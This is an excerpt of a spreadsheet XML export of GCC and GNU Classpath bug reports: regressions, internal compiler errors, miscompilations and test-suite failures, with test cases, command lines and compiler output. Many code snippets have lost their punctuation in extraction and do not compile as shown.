Derived's base class is non-dependent name so in the class scope Derived name T is Base::T not a template parameter name T.
So for instantiation Derived the name T in Derived class scope is Base::T. it's type is int.
But in gcc 4.6
Although the type of Derived::member is int
the type of T become double in the member function body.
It looks like gcc 4.6 treat name T as a template parameter T in member function body.</t>
  </si>
  <si>
    <t>GCC-2184</t>
  </si>
  <si>
    <t>using declarations for classes in function templates</t>
  </si>
  <si>
    <t>The following code doesn't compile on the 3.0 branch.  It's a regression
compared to 2.95.2.  It gives :
pr_vector.C: In function `void f(const J&amp;)':
pr_vector.C:9: ISO C++ forbids declaration of `vector' with no type
pr_vector.C:9: template-id `vector' used as a declarator
pr_vector.C:9: parse error before `' token
pr_vector.C: In function `void f(const J&amp;) [with J = int]':
pr_vector.C:13:   instantiated from here
pr_vector.C:9: `typedef int vector' redeclared as different kind of symbol
pr_vector.C:3: previous declaration of `template class std::vector'
pr_vector.C:9: declaration of `typedef vector vector'
pr_vector.C:3: conflicts with previous declaration `template class
   std::vector'
Note 1 : it works when f() is not template.
Note 2 : it's similar to the PR c++/1981 which was fixed by Nathan Sidwell
         but this new one concerns classes instead of functions.
Release:
3.0 20010305 (prerelease)
Environment:
System: Linux zosma 2.2.14 #1 SMP Fri Jan 14 14:39:36 MET 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /u/zosma/0/prisme/spion/gcc/gcc/configure --with-as=/u/zosma/0/prisme/spion/gcc/Binutils/Linux/bin/as --with-ld=/u/zosma/0/prisme/spion/gcc/Binutils/Linux/bin/ld --enable-languages=c++ --prefix=/u/zosma/0/prisme/spion/gcc/Linux_CVS_v3
How-To-Repeat:
namespace std {
template 
class vector {}
}
template 
void f(const J&amp;) {
  using std::vector
  typedef vector V
}
int main() {
  f(0)
}</t>
  </si>
  <si>
    <t>GCC-2197</t>
  </si>
  <si>
    <t>error before '$' but no '$' in compilation unit</t>
  </si>
  <si>
    <t>The following illegal code generates a parse error before '$'
message. But there is no '$' in the source file or in the
preprocessed source code.
Release:
3.1 20010304 (experimental)
Environment:
System: Linux kiste 2.4.2 #34 Sun Feb 25 20:03:34 CET 2001 i686 unknown
Architecture: i686
SuSE 7.1	
GLIBC 2.2
GNU ld version 2.10.91 (with BFD 2.10.1.0.4)
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long
How-To-Repeat:
source code t.C
#define LONG_LONG_MAX 9223372036854775807LL
#define LONG_LONG_MIN (-LONG_LONG_MAX-1)
template
        class C {}
template
public C
    { }
int main()
{
}
Compiling the program t.C
g++ -v -o t t.C -W -Wall -save-temps
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long
gcc version 3.1 20010304 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cpp0 -lang-c++ -D_GNU_SOURCE -D__GNUG__=3 -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -W -Wall -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ t.C t.ii
GNU CPP version 3.1 20010304 (experimental) (cpplib) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cc1plus -fpreprocessed t.ii -quiet -dumpbase t.C -W -Wall -version -o t.s
GNU CPP version 3.1 20010304 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.1 20010304 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 3.1 20010304 (experimental).
t.C:8: parse error before `$'
Preprocessed source code t.ii
# 4 t.C
template
        class C {}
template
public C
    { }
int main()
{
}</t>
  </si>
  <si>
    <t>CLASSPATH-29795</t>
  </si>
  <si>
    <t>classpath-2006-11-10 compile error</t>
  </si>
  <si>
    <t>Found 1 semantic error compiling ../javax/swing/text/html/StyleSheet.java:
   106.   class CSSStyleSheetParserCallback
                ^-------------------------^
*** Semantic Error: The abstract method void startStatement(gnu.javax.swing.text.html.css.Selector selector) inherited from type gnu.javax.swing.text.html.css.CSSParserCallback is not implemented in the non-abstract class javax.swing.text.html.StyleSheet$CSSStyleSheetParserCallback.</t>
  </si>
  <si>
    <t>GCC-32345</t>
  </si>
  <si>
    <t>Unconditional snprintf use breaks all gfortran exec tests on Tru64 UNIX V4.0F</t>
  </si>
  <si>
    <t xml:space="preserve">
All gfortran execute tests fail on alpha-dec-osf4.0f since snprintf is
missing in libc but used in libgfortran.
Environment:
System: OSF1 hindemith V4.0 1229 alpha
Machine: alpha
host: alpha-dec-osf4.0f
build: alpha-dec-osf4.0f
target: alpha-dec-osf4.0f
configured with: /vol/gcc/src/gcc-dist/configure --prefix=/vol/gcc --with-local-prefix=/vol/gcc --disable-nls --host alpha-dec-osf4.0f --build alpha-dec-osf4.0f --target alpha-dec-osf4.0f --with-gmp=/vol/gcc --with-mpfr=/vol/gcc --enable-languages=cc++fortranjavaobjcada --disable-libmudflap
How-To-Repeat:
Bootstrap and test on alpha-dec-osf4.0f.</t>
  </si>
  <si>
    <t>GCC-77933</t>
  </si>
  <si>
    <t>Stack corruption on ARM when using high registers and __builtin_return_address</t>
  </si>
  <si>
    <t>When compiling the following testcase with -march=armv6-m -mthumb -O1:
void* foo() {
  asm volatile( : : : r8 r9)
  return __builtin_return_address(0)
}
GCC produces the following assembler:
        mov     r3 r9
        push    {r3 lr}
        mov     r3 r8
        push    {r3 lr}
        mov     r0 lr
        pop     {r2 r3}
        mov     r8 r2
        mov     r9 r3
        pop     {pc}
Note how 4 words are pushed on the stack but only 3 are popped hence the stack gets corrupted</t>
  </si>
  <si>
    <t>GCC-29607</t>
  </si>
  <si>
    <t>[DR 224] [4.2/4.3/4.4 Regression] dependent name with base classes</t>
  </si>
  <si>
    <t>the wvstreams package fails to build:
  Matthias
x86_64-linux-gnu-g++ -Wall -save-temps -O2  -D_BSD_SOURCE -D_GNU_SOURCE -DISLINUX -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -g -DDEBUG=0  -O2 -Wall -I/usr/include/tcl8.3 -I/usr/include -I/usr/include/qt3 -I/usr/include/xplc-0.3.13    -I./include -Iinclude -Iinclude -Ignulib -pipe  -D_GNU_SOURCE -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -g -O2 -Wall   -D_BSD_SOURCE -D_GNU_SOURCE -DISLINUX -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -g -DDEBUG=0 -O2 -Wall -Woverloaded-virtual -fno-rtti -fno-exceptions -I/usr/include/tcl8.3 -I/usr/include -I/usr/include/qt3 -I/usr/include/xplc-0.3.13    -I./include -Iinclude -Iinclude -Ignulib -pipe  -fpermissive -D_GNU_SOURCE -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -g -O2 -Wall -Woverloaded-virtual -DWVSTREAMS_RELEASE=\4.2.2\     -c utils/wvvector.cc -o utils/wvvector.o
x86_64-linux-gnu-g++: warning: -pipe ignored because -save-temps specified
./include/wvvector.h: In member function 'T* WvVector::Iter::ptr() const':
./include/wvvector.h:361: warning: there are no arguments to 'cur' that depend on a template parameter so a declaration of 'cur' must be available
./include/wvvector.h: In member function 'bool WvVector::Iter::get_autofree() const':
./include/wvvector.h:371: error: 'link' was not declared in this scope
./include/wvvector.h: In member function 'void WvVector::Iter::set_autofree(bool)':
./include/wvvector.h:379: error: 'link' was not declared in this scope
./include/wvvector.h: In member function 'void WvVector::Iter::remove(bool)':
./include/wvvector.h:389: error: 'i' was not declared in this scope
./include/wvvector.h: In member function 'void WvVector::Iter::xremove(bool)':
./include/wvvector.h:407: error: 'i' was not declared in this scope
./include/wvvector.h:408: warning: there are no arguments to 'prev' that depend on a template parameter so a declaration of 'prev' must be available
make: *** [utils/wvvector.o] Error 1</t>
  </si>
  <si>
    <t>GCC-14335</t>
  </si>
  <si>
    <t>Infinite loop while compiling Sendmail with -ftracer</t>
  </si>
  <si>
    <t>Compiling Sendmail's savemail.c with -ftracer causes gcc to enter an infinite 
loop eating 100% CPU. Compiling without -ftracer works just fine.
cc -O -v -save-temps -ftracer -fprefetch-loop-arrays  -
I/usr/src/usr.sbin/sendmail/../../contrib/sendmail/src -
I/usr/src/usr.sbin/sendmail/../../contrib/sendmail/include -I. -DNEWDB -DNIS -
DMILTER -DNETINET6 -DTCPWRAPPERS -DMAP_REGEX -DDNSMAP -DSTARTTLS -
D_FFR_TLS_1   -c /usr/src/contrib/sendmail/src/savemail.c
Using built-in specs.
Configured with: FreeBSD/sparc64 system compiler
Thread model: posix
gcc version 3.3.3 [FreeBSD] 20031106
 /usr/obj/usr/src/sparc64/usr/libexec/cc1 -E -quiet -v -
I/usr/src/usr.sbin/sendmail/../../contrib/sendmail/src -
I/usr/src/usr.sbin/sendmail/../../contrib/sendmail/include -I. -D__GNUC__=3 -
D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=3 -D__sparc64__ -D__sparc_v9__ -
D__sparcv9 -D__sparc__ -D__arch64__ -D_LONGLONG -DNEWDB -DNIS -DMILTER -
DNETINET6 -DTCPWRAPPERS -DMAP_REGEX -DDNSMAP -DSTARTTLS -
D_FFR_TLS_1 /usr/src/contrib/sendmail/src/savemail.c -ftracer -fprefetch-loop-
arrays -O savemail.i
ignoring duplicate directory /usr/obj/usr/src/sparc64/usr/include
#include ... search starts here:
#include  search starts here:
 /usr/src/contrib/sendmail/src
 /usr/src/contrib/sendmail/include
 .
 /usr/obj/usr/src/sparc64/usr/include
End of search list.
 /usr/obj/usr/src/sparc64/usr/libexec/cc1 -fpreprocessed savemail.i -quiet -
dumpbase savemail.c -auxbase savemail -O -version -ftracer -fprefetch-loop-
arrays -o savemail.s
GNU C version 3.3.3 [FreeBSD] 20031106 (sparc64-undermydesk-freebsd)
        compiled by GNU C version 3.3.3 [FreeBSD] 20031106.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096</t>
  </si>
  <si>
    <t>r.s.a.vandomburg</t>
  </si>
  <si>
    <t>GCC-56982</t>
  </si>
  <si>
    <t>[4.8 Regression] Bad optimization with setjmp()</t>
  </si>
  <si>
    <t>Created attachment 29883
Bug program
Compile the example program with gcc -Og jmp.c -o jmp
Run the program ./jmp and the output is
Returning 1
x = 0 n = 1
Returning 0
x = 42 n = 1
Aborted
The function g() is returning 0 the second time (after longjmp()) but the return value assigned to n equals 1. With other optimization levels or with earlier versions of gcc or with -Og -fno-tree-dominator-opts the output is what I expect:
Returning 1
x = 0 n = 1
Returning 0
x = 42 n = 0
This is with gcc version 4.8.0 GNU libc version 2.15.</t>
  </si>
  <si>
    <t>jdemeyer</t>
  </si>
  <si>
    <t>GCC-24719</t>
  </si>
  <si>
    <t>[4.1 Regression] Nonadvancing read does not read more than 1 line</t>
  </si>
  <si>
    <t>Revision 1.64 of libgfortran/io/transfer.c causes a regression for the following testcase:
% cat  regression.f90
program demonstration
    implicit none
    character(len=1) :: saux
    open(unit = 1 FILE = foo.conf STATUS = 'OLD' ACTION = 'READ')
    do
10    read(unit = 1 fmt = '(a)' advance = 'no' end = 99 eor = 11) saux
      print * ' saux '
      cycle
11    print * Newline
    end do
99  close(1)
end program
EOF
% cat  foo.conf
foo1: bar
1.2
EOF
ifort and g95 compiled binaries give:
 'f'
 'o'
 'o'
 '1'
 ':'
 ' '
 'b'
 'a'
 'r'
 Newline
 '1'
 '.'
 '2'
 Newline
while gfortran 4.1.0 20051024 gives only the characters from the first line of 'foo.conf' all characters after the first 'end of record' are whitespace:
 'f'
 'o'
 'o'
 '1'
 ':'
 ' '
 'b'
 'a'
 'r'
 Newline
 ' '
 ' '
 ' '
 Newline
For sake of compliance with the bug report policy:
* gfortran from cvs via 
    TZ=GMT cvs -q update -D'2005.10.24.03.00.00'
  works
* gfortran from cvs via 
    TZ=GMT cvs -q update -D'2005.10.24.04.00.00'
  does not.
--------
By the way there is another small issue with the above testcase. I'm not sure if I should file a separate bug report for it:
Changing line 6 of regression.f90 to 
10    read(unit = 1 fmt = '(a)' advance = 'no' end = 99 eor = 10) saux
gives the incorrect warning:
 In file regression.f90:6
10    read(unit = 1 fmt = '(a)' advance = 'no' end = 99 eor = 10) saux
                                                                         1
Warning: Branch at (1) causes an infinite loop
while ifort and g95 do not complain.</t>
  </si>
  <si>
    <t>GCC-52835</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] -O3 wrongly optimizes loop __builtin_memcpy away</t>
  </si>
  <si>
    <t>&gt;uname -sm
Linux x86_64
&gt;cat qq.f
      SUBROUTINE QQ2( ISU ZSPM RSV MS )
      INTEGER :: ISU(MS)
      CHARACTER(8) :: ZSPM(MS)
      REAL :: RSV(MS)
      DO IS=1MS
         ISU(IS)=0
         ZSPM(IS)=' '
         RSV(IS) =0.0
      ENDDO
      END subroutine qq2
      SUBROUTINE QQ()
      INTEGER ALLOCATABLE :: ISU(:)
      CHARACTER(8) ALLOCATABLE :: ZSPM(:)
      REAL ALLOCATABLE :: RSV(:)
      ALLOCATE( RSV(3) )
      ALLOCATE( ISU(3) )
      ALLOCATE( ZSPM(3) )
      CALL QQ2( ISU ZSPM RSV 3 )
      write(**) '--&gt;'zspm(1)
      END subroutine qq
      program p1
      call qq()
      end program p1
&gt;gfortran470 -O3 -g qq.f -static-libgfortran  valgrind --track-origins=yes ./a.out
==18017== Memcheck a memory error detector
==18017== Copyright (C) 2002-2011 and GNU GPL'd by Julian Seward et al.
==18017== Using Valgrind-3.7.0 and LibVEX rerun with -h for copyright info
==18017== Command: ./a.out
==18017==
==18017== Syscall param write(buf) points to uninitialised byte(s)
==18017==    at 0x3541CC4150: __write_nocancel (in /lib64/libc-2.5.so)
==18017==    by 0x40981C: raw_write (unix.c:308)
==18017==    by 0x40F4FE: _gfortrani_fbuf_flush (unix.h:56)
==18017==    by 0x405416: _gfortrani_next_record (transfer.c:3397)
==18017==    by 0x405CF8: _gfortran_st_write_done (transfer.c:3592)
==18017==    by 0x401C5B: qq_ (qq.f:22)
==18017==    by 0x401CFC: main (qq.f:26)
==18017==  Address 0x4c2fb44 is 4 bytes inside a block of size 512 alloc'd
==18017==    at 0x4A0776F: malloc (vg_replace_malloc.c:263)
==18017==    by 0x4037B8: _gfortrani_get_mem (memory.c:43)
==18017==    by 0x40F38A: _gfortrani_fbuf_init (fbuf.c:43)
==18017==    by 0x408F89: _gfortrani_init_units (unit.c:585)
==18017==    by 0x403747: init (main.c:226)
==18017==    by 0x4196F5: ??? (in /tmp/arnaud/a.out)
==18017==    by 0x401612: ??? (in /tmp/arnaud/a.out)
==18017==    by 0x9CA212C00000000: ???
==18017==    by 0x419676: __libc_csu_init (in /tmp/arnaud/a.out)
==18017==    by 0x3541C1D84D: (below main) (in /lib64/libc-2.5.so)
==18017==  Uninitialised value was created by a heap allocation
==18017==    at 0x4A0776F: malloc (vg_replace_malloc.c:263)
==18017==    by 0x401BE0: qq_ (qq.f:20)
==18017==    by 0x401CFC: main (qq.f:26)
==18017==
 --&gt;
==18017==
==18017== HEAP SUMMARY:
==18017==     in use at exit: 0 bytes in 0 blocks
==18017==   total heap usage: 20 allocs 20 frees 3878 bytes allocated
==18017==
==18017== All heap blocks were freed -- no leaks are possible
==18017==
==18017== For counts of detected and suppressed errors rerun with: -v
==18017== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 4 from 4)
The test case above demonstrates the problem observed on a large production system. In qq2 zspm is not set properly to   as shown by valgrind. This is taking place only when compiled with -O3. 
This is a regression with respect to gfortran 4.6.2.</t>
  </si>
  <si>
    <t>GCC-59592</t>
  </si>
  <si>
    <t>Segmentation fault in fold_comparison at -O1</t>
  </si>
  <si>
    <t>Hello !
The following testcase makes GCC 4.9.0 as of 20131224 segfault at -O1.
$ cat seg.c
long a b
void f(void)
{
    if(0)
    {
        int c d
lbl1:
        for(c = 0 c &lt; 1 c++)
            for(b = 0 b &lt; 1)
        d %= d
lbl2:
        d ? : 1
    }
    if(a++)
        goto lbl1
    int e = 1
    if((a ^= a ? : 0) &lt; (e &amp;&amp; (e %= e)))
        goto lbl2
    int *p = 
}
$ xgcc -O1 seg.c
seg.c: In function â€˜fâ€™:
seg.c:26:1: internal compiler error: Segmentation fault
 }
 ^
0x9d80bf crash_signal
	../../srcdir/gcc/toplev.c:336
0x79a239 fold_comparison
	../../srcdir/gcc/fold-const.c:9078
0x7a318b fold_binary_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
	../../srcdir/gcc/fold-const.c:12953
0xa0fe01 cleanup_control_expr_graph
	../../srcdir/gcc/tree-cfgcleanup.c:112
0xa0fe01 cleanup_control_flow_bb
	../../srcdir/gcc/tree-cfgcleanup.c:187
0xa0fe01 cleanup_tree_cfg_bb
	../../srcdir/gcc/tree-cfgcleanup.c:605
0xa118a8 cleanup_tree_cfg_1
	../../srcdir/gcc/tree-cfgcleanup.c:650
0xa118a8 cleanup_tree_cfg_noloop
	../../srcdir/gcc/tree-cfgcleanup.c:706
0xa118a8 cleanup_tree_cfg()
	../../srcdir/gcc/tree-cfgcleanup.c:761
0x92e1d4 execute_function_todo
	../../srcdir/gcc/passes.c:1808
0x92eab3 execute_todo
	../../srcdir/gcc/passes.c:1884
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-45842</t>
  </si>
  <si>
    <t>New obj(c-c++) failures</t>
  </si>
  <si>
    <t>All the failures in the following lists are new but for objc.dg/headers.m and objc.dg/no-extra-load.m.
		=== objc tests ===
Schedule of variations:
    unix/-m32
    unix/-m64
Running target unix/-m32
FAIL: objc.dg/const-str-12b.m -fnext-runtime (test for excess errors)
FAIL: objc.dg/encode-3.m -fnext-runtime (test for excess errors)
FAIL: objc.dg/encode-7-next-64bit.m -fnext-runtime (test for excess errors)
FAIL: objc.dg/encode-7-next-64bit.m -fnext-runtime execution test
FAIL: objc.dg/encode-7-next.m -fnext-runtime (test for excess errors)
FAIL: objc.dg/encode-7-next.m -fnext-runtime execution test
FAIL: objc.dg/headers.m -fnext-runtime (test for excess errors)
FAIL: objc.dg/no-extra-load.m -fnext-runtime (test for excess errors)
ERROR: objc.dg/no-extra-load.m: error executing dg-final: couldn't open no-extra-load.s: no such file or directory
FAIL: objc.dg/proto-qual-1.m -fnext-runtime execution test
FAIL: objc.dg/threedotthree-abi-1.m -fnext-runtime execution test
FAIL: objc.dg/type-size-2.m -fnext-runtime (test for excess errors)
XPASS: objc.dg-struct-layout-encoding-1/t026_main.m execution test
		=== objc Summary for unix/-m32 ===
# of expected passes		4170
# of unexpected failures	11
# of unexpected successes	1
# of expected failures		6
# of unresolved testcases	1
# of unsupported tests		31
Running target unix/-m64
FAIL: objc.dg/const-str-12b.m -fnext-runtime (test for excess errors)
FAIL: objc.dg/encode-3.m -fnext-runtime (test for excess errors)
FAIL: objc.dg/encode-7-next-64bit.m -fnext-runtime (test for excess errors)
WARNING: objc.dg/encode-7-next-64bit.m -fnext-runtime compilation failed to produce executable
FAIL: objc.dg/encode-7-next.m -fnext-runtime (test for excess errors)
WARNING: objc.dg/encode-7-next.m -fnext-runtime compilation failed to produce executable
FAIL: objc.dg/headers.m -fnext-runtime (test for excess errors)
FAIL: objc.dg/method-20b.m -fnext-runtime (test for excess errors)
WARNING: objc.dg/method-20b.m -fnext-runtime compilation failed to produce executable
FAIL: objc.dg/no-extra-load.m -fnext-runtime (test for excess errors)
ERROR: objc.dg/no-extra-load.m: error executing dg-final: couldn't open no-extra-load.s: no such file or directory
FAIL: objc.dg/threedotthree-abi-1.m -fnext-runtime execution test
FAIL: objc.dg/type-size-2.m -fnext-runtime (test for excess errors)
XPASS: objc.dg-struct-layout-encoding-1/t026_main.m execution test
		=== objc Summary for unix/-m64 ===
# of expected passes		2850
# of unexpected failures	9
# of unexpected successes	1
# of expected failures		55
# of unresolved testcases	1
# of unsupported tests		36
		=== objc Summary ===
# of expected passes		7020
# of unexpected failures	20
# of unexpected successes	2
# of expected failures		61
# of unresolved testcases	2
# of unsupported tests		67
/opt/gcc/build_w/gcc/xgcc  version 4.6.0 20100930 (experimental) [trunk revision 164743p2] (GCC) 
		=== obj-c++ tests ===
Schedule of variations:
    unix/-m32
    unix/-m64
Running target unix/-m32
WARNING: obj-c++.dg/lookup-2.mm -fgnu-runtime compilation failed to produce executable
WARNING: obj-c++.dg/try-catch-2.mm -fgnu-runtime compilation failed to produce executable
WARNING: obj-c++.dg/try-catch-9.mm -fgnu-runtime compilation failed to produce executable
FAIL: obj-c++.dg/const-str-12.mm -fnext-runtime (test for excess errors)
FAIL: obj-c++.dg/encode-3.mm -fnext-runtime execution test
		=== obj-c++ Summary for unix/-m32 ===
# of expected passes		1280
# of unexpected failures	2
# of expected failures		3
# of unsupported tests		18
Running target unix/-m64
WARNING: obj-c++.dg/lookup-2.mm -fgnu-runtime compilation failed to produce executable
WARNING: obj-c++.dg/try-catch-2.mm -fgnu-runtime compilation failed to produce executable
WARNING: obj-c++.dg/try-catch-9.mm -fgnu-runtime compilation failed to produce executable
FAIL: obj-c++.dg/const-str-12.mm -fnext-runtime (test for excess errors)
FAIL: obj-c++.dg/encode-3.mm -fnext-runtime execution test
FAIL: obj-c++.dg/method-22.mm -fnext-runtime (test for excess errors)
WARNING: obj-c++.dg/method-22.mm -fnext-runtime compilation failed to produce executable
FAIL: obj-c++.dg/method-23.mm -fnext-runtime (test for excess errors)
WARNING: obj-c++.dg/method-23.mm -fnext-runtime compilation failed to produce executable
FAIL: obj-c++.dg/threedotthree-abi-1.mm -fnext-runtime execution test
WARNING: obj-c++.dg/try-catch-2.mm -fnext-runtime compilation failed to produce executable
WARNING: obj-c++.dg/try-catch-9.mm -fnext-runtime compilation failed to produce executable
		=== obj-c++ Summary for unix/-m64 ===
# of expected passes		1183
# of unexpected failures	5
# of expected failures		61
# of unsupported tests		22
		=== obj-c++ Summary ===
# of expected passes		2463
# of unexpected failures	7
# of expected failures		64
# of unsupported tests		40
/opt/gcc/build_w/gcc/testsuite/obj-c++/../../g++  version 4.6.0 20100930 (experimental) [trunk revision 164743p2] (GCC)</t>
  </si>
  <si>
    <t>GCC-80555</t>
  </si>
  <si>
    <t>[6/7/8 Regression] ICE when using MAXVAL of a rank-2 PARAMETER array in a module</t>
  </si>
  <si>
    <t>Created attachment 41282
Run gfortran -c on this.
gfortran crashes with segmentation fault when compiling the attached file. Problem is related to using MAXVAL of a rank-2 PARAMETER array as dimension for a static variable.No special flags required just gfortran -c. No assembly generated. Running on Debian Jessie tested with Debian's gcc 5.3.0 and 6.2.0 plus locally compiled 5.4.0. Compiler output from 6.2.0 is terse from 5.4.0 is pasted below:f951: internal compiler error: Segmentation fault
0xa8d25f crash_signal
	../../gcc/toplev.c:383
0x6e9d72 gfc_add_decl_to_parent_function
	../../gcc/fortran/trans-decl.c:239
0x6e9d72 create_index_var
	../../gcc/fortran/trans-decl.c:802
0x6ebffa gfc_build_qualified_array
	../../gcc/fortran/trans-decl.c:889
0x6eec34 gfc_get_symbol_decl(gfc_symbol*)
	../../gcc/fortran/trans-decl.c:1549
0x6f0f3b gfc_create_module_variable
	../../gcc/fortran/trans-decl.c:4592
0x6bd42b do_traverse_symtree
	../../gcc/fortran/symbol.c:3646
0x6f0c4b gfc_generate_module_vars(gfc_namespace*)
	../../gcc/fortran/trans-decl.c:5035
0x6d4bd1 gfc_generate_module_code(gfc_namespace*)
	../../gcc/fortran/trans.c:2061
0x68f14d translate_all_program_units
	../../gcc/fortran/parse.c:5393
0x68f14d gfc_parse_file()
	../../gcc/fortran/parse.c:5603
0x6ce915 gfc_be_parse_file
	../../gcc/fortran/f95-lang.c:229</t>
  </si>
  <si>
    <t>gustavo.hime</t>
  </si>
  <si>
    <t>GCC-77860</t>
  </si>
  <si>
    <t>[7 Regression] ICE in gimple_build_assign_1 at gimple.c:420</t>
  </si>
  <si>
    <t>gcc-7.0.0-alpha20161002 ICEs when compiling the following reduced testcase w/ -march=nehalem -mavx2 -O2 -fpeel-loops -ftree-loop-vectorize for x86_64:
void
t5 (int n9 unsigned short int s4)
{
  for ()
    {
      char gw = 0
      short int jy
      unsigned int hs
      for (gw = 0 gw &lt; 64 ++gw)
        {
          hs = jy = 0
          s4 *= (hs != 0) ? hs : (jy -= (1 
        }
      if (s4 == 0)
        n9 = s4
    }
}
% x86_64-pc-linux-gnu-gcc-7.0.0-alpha20161002 -march=nehalem -mavx2 -O2 -fpeel-loops -ftree-vectorize -c ir9p4mm5.c                       
ir9p4mm5.c: In function 't5':
ir9p4mm5.c:2:1: internal compiler error: in gimple_build_assign_1 at gimple.c:420
 t5 (int n9 unsigned short int s4)
 ^~</t>
  </si>
  <si>
    <t>GCC-49712</t>
  </si>
  <si>
    <t>internal compiler error: in gen_lsm_tmp_name at tree-ssa-loop-im.c:2048</t>
  </si>
  <si>
    <t>[regehr@gamow tmp040]$ current-gcc -Ofast small.c
small.c: In function 'main':
small.c:40:5: internal compiler error: in gen_lsm_tmp_name at tree-ssa-loop-im.c:2048
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[regehr@gamow tmp040]$ current-gcc -v
Using built-in specs.
COLLECT_GCC=current-gcc
COLLECT_LTO_WRAPPER=/uusoc/exports/scratch/regehr/z/compiler-install/gcc-r176182-install/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --with-libelf=/usr/local --enable-lto --prefix=/home/regehr/z/compiler-install/gcc-r176182-install --program-prefix=r176182- --enable-languages=cc++
Thread model: posix
gcc version 4.7.0 20110711 (experimental) (GCC) 
[regehr@gamow tmp040]$ cat small.c
int safe_14 (int si1 int si2) {
  return 0
}
struct S0 {
  int f5
}
struct S1 {
}
int g_60[100]
int g_61
int g_62
struct S0 g_74
int g_104
struct S1 g_660
int func_75 (struct S0 *p_78) {
 lbl_126:
  for ( 0)
    goto lbl_126
  return 0
}
struct S0 *func_80 (void) {
  int l_90
  for (l_90 = 0 l_90 &lt;= 4 l_90 += 1)
    for ( g_74.f5 &lt;= 0 g_74.f5 = 1)
      {
	int i
	for (i = 0 i &lt; 4 i++)
	  for (g_104 = 0 g_104 g_104 = 1)
	    {
	    }
      }
  return 0
}
int main (void) {
  for (g_61 = 0 g_61 &lt;= 0 g_61 += 1) {
    for ( g_62 g_62 -= 0) {
      long *l_132 = 0
      safe_14 (g_60[g_61] = 0 func_75 (func_80 ())) *l_132 = (func_80 () 0)
    }
  }
  return 0
}</t>
  </si>
  <si>
    <t>GCC-28083</t>
  </si>
  <si>
    <t>fixincludes generates headers not ending with newline</t>
  </si>
  <si>
    <t>Some of the headers produces by fixincludes (e.g. asm/posix_types.h) do not end with a newline.
I'm not sure if this is a bug in autogen or improper use of autogen (the autogen-generated replacement text in fixincl.x ends e.g. with
      #endif /* _POSIX_TYPES_H_WRAPPER */
again without newline) or a bug in the C code processing this replacement text.</t>
  </si>
  <si>
    <t>GCC-48122</t>
  </si>
  <si>
    <t>crypto/aes test fails on 32-bit Solaris 11/x86</t>
  </si>
  <si>
    <t>The crypto/aes test recently started failing on 32-bit Solaris 11/x86 (only
64-bit is fine):
FAIL: crypto/aes
--- FAIL: aes.TestCipherDecrypt
	decryptBlock 0: plain[0] = 0x0 want 0x32
	decryptBlock 1: plain[1] = 0x0 want 0x11
	decryptBlock 2: plain[1] = 0x0 want 0x11
	decryptBlock 3: plain[1] = 0x0 want 0x11
--- FAIL: aes.TestCipherEncrypt
	Cipher.Encrypt 0: out[0] = 0x0 want 0x32
	Cipher.Encrypt 1: out[1] = 0x0 want 0x11
	Cipher.Encrypt 2: out[1] = 0x0 want 0x11
	Cipher.Encrypt 3: out[1] = 0x0 want 0x11
FAIL
make: *** [crypto/aes/check] Error 1
I'm pretty sure it worked before but cannot be certain since libgo testsuite
results don't show up in mail-report.log.</t>
  </si>
  <si>
    <t>GCC-54349</t>
  </si>
  <si>
    <t>_mm_cvtsi128_si64 unnecessary stores value at stack</t>
  </si>
  <si>
    <t>Consider following program:
#include 
#include 
int64_t foo(__m128i a){return  _mm_cvtsi128_si64(a)}
int64_t bar(double b){ return *((int64_t*)}
A _mm_cvtsi128_si64 does unnecesary store into stack instead moving to register directly. Same problem is present when interpreting double as integer.
  .file e.c
  .text
  .p2align 415
  .globl  foo
  .type foo @function
foo:
.LFB517:
  .cfi_startproc
  movq  %xmm0 -16(%rsp)
  movq  -16(%rsp) %rax
  ret
  .cfi_endproc
.LFE517:
  .size foo .-foo
  .p2align 415
  .globl  bar
  .type bar @function
bar:
.LFB518:
  .cfi_startproc
  movsd %xmm0 -8(%rsp)
  movq  -8(%rsp) %rax
  ret
  .cfi_endproc
.LFE518:
  .size bar .-bar
  .ident  GCC: (Debian 20120820-1) 4.8.0 20120820 (experimental) [trunk revision 190537]
  .section  .note.GNU-stack@progbits</t>
  </si>
  <si>
    <t>neleai</t>
  </si>
  <si>
    <t>GCC-34415</t>
  </si>
  <si>
    <t>[4.3 Regression] Possible miscompilation on MIPS</t>
  </si>
